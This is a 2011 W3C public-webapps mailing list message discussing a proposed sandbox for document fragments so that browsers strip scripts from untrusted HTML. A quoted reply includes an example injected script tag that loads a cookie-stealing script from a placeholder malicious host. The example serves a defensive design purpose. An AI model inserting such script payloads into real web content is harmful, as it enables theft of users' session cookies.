- From: Jonas Sicking <jonas@sicking.cc>
- Date: Mon, 7 Nov 2011 20:36:19 -0800
- To: Ryan Seddon <seddon.ryan@gmail.com>
- Cc: Ojan Vafai <ojan@chromium.org>, Yehuda Katz <wycats@gmail.com>, public-webapps WG <public-webapps@w3.org>
On Mon, Nov 7, 2011 at 8:23 PM, Ryan Seddon <seddon.ryan@gmail.com> wrote: > On Tue, Nov 8, 2011 at 4:30 AM, Ojan Vafai <ojan@chromium.org> wrote: >> >> I don't really follow. Script won't execute until you append the fragment >> to the DOM, at which point the fragment itself doesn't go in the DOM, just >> it's children. So, I'm not really sure what sandboxing on fragments would >> do. > > If I was ajaxing in potentially hostile content that had malicious script > tags in it it would be ideal to "sandbox" the content so the HTML parser in > the browser would strip the content for me. > > xhr.responseText = "<div><script > src="//malicious.site/cookieStealer.js"></script><h1>content</h1></div>"; > > var frag = document.createDocumentFragment(); > > frag.sandbox = ""; > frag.innerHTML = xhr.responseText; // it's sandboxed so the script(s) will > be stripped by the parser. > > document.body.appendChild(frag); > > The following article demonstrates the same concept using an iframe with the > sandbox attribute set[1]. This to me would also make sense to be extended to > fragments. > > [1] > http://community.jboss.org/people/wesleyhales/blog/2011/08/28/fixing-ajax-on-mobile-devices I do think we should add something like this, however I think we should have a more explicit syntax for it. There's an old thread with subject "innerStaticHTML" in the WHATWG list which discusses this topic and various possible syntaxes. Note that inserting a untrusted piece of HTML into your document is interesting not just when dealing with document fragments. Both div.innerHTML as well as div.insertAdjecentHTML(...) seems like they could use "safe" variants. In short, I think a separate thread is needed for this :) / Jonas
Received on Tuesday, 8 November 2011 04:37:27 UTC